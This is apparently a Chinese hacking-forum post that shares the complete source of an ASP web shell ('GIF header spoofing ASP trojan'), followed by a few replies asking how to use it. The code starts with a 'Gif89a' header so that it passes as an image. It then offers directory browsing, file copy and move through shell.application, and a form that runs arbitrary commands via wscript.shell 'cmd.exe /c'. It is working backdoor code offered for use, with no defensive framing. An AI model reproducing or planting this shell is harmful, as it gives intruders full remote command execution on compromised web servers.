打印

GIF片头欺骗ASP木马

GIF片头欺骗ASP木马

Gif89a
<html><body>
<%response.write "<font size=6 color=red>一次只能执行一个操作:)</font>" %>  
<%response.write now()%><BR>程序所在的物理路径:  
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>  
<html>  
<title>badwolf’s shell.application backdoor</title>  
<body>  
<form action="<%= Request.ServerVariables("URL") %>" method="POST">  
<input type=text name=text value="<%=szCMD %>"> 输入要浏览的目录<br>  
<input type=text name=text1 value="<%=szCMD1 %>">  
copy  
<input type=text name=text2 value="<%=szCMD2 %>"><br>  
<input type=text name=text3 value="<%=szCMD3 %>">  
move  
<input type=text name=text4 value="<%=szCMD4 %>"><br>  
路径:<input type=text name=text5 value="<%=szCMD5 %>">  
程序:<input type=text name=text6 value="<%=szCMD6 %>"><br>  
<input type=submit name=sb value=发送命令>  
</form>  
</body>  
</html>  
<%  
szCMD = Request.Form("text") ’’目录浏览  
if (szCMD <> "") then  
set shell=server.createobject("shell.application") ’’建立shell对象  
set fod1=shell.namespace(szcmd)  
set foditems=fod1.items  
for each co in foditems  
response.write "<font color=red>" & co.path & "-" & co.size & "</font><br>"  
next  
end if  
%>  
<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
</body>
</html>
</body></html>

TOP

怎么用啊

TOP

怎么用?

TOP

看不懂捏。。。。。。。。。

TOP